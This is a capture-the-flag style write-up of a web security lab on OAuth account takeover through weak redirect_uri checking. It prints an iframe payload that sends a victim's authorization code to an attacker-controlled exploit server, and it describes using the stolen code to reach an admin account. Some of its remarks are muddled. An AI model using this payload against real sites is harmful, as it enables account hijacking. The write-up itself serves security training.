LAB#03 OAuth account hijacking via redirect_uri
Understanding and exploiting an insecure redirect_uri validation in OAuth.

Lab Overview
This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it possible for an attacker to steal authorization codes associated with other users' accounts.
To solve the lab, steal an authorization code associated with the admin user, then use it to access their account and delete the user carlos.
The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service.
Credentials:
Username: wiener
Password: peter
Exploitation
#1 Logging In
By clicking My account it will redirect to social media login.
When redirection happens, it is sending a GET request to /auth.
client_id: d29pyj8d1qb33zo061roj redirect_uri: https://0a7000d10463074782fc799300210026.web-security-academy.net/oauth-callback response_type: code scope: openid%20profile%20email
Here we can see that the scope is missing. scope specifies the permissions being requested (e.g., openid profile email).
Now login with credentials.
OAuth callback request containing the authorization code. lets modify the redirect_uri to our exploit server and capture the victim's code parameter.
Here we can see it is redirecting to evil.net and the code is reusable.
#2 Crafting the Payload
Crafting the CSRF payload to get the code from the victim.
<html>
<head>
<title>PAYLOAD</title>
</head>
<body>
<iframe src="https://oauth-0a5900bd036f8961807c010902b60022.oauth-server.net/auth?client_id=v7j8CfcXOUHq9knuM7spVQtEL7gRqBej8-Iag9rV2mh&redirect_uri=https://exploit-0acb000d033689718055022f01cb0047.exploit-server.net/exploit/log&response_type=code&scope=openid%20profile%20email"></iframe>
</body>
</html>
Store the exploit and deliver the exploit to the victim, then go back to the access log and copy the victim's code from the resulting request.
#3 Admin Access
After logging out, open the following URL with the stolen OAuth code
We got Admin panel access.
Open the admin panel and delete carlos to solve the lab.
Deleted carlos!
# And That’s a Wrap
OAuth authorization codes must be protected, as exposing them can result in account takeover.




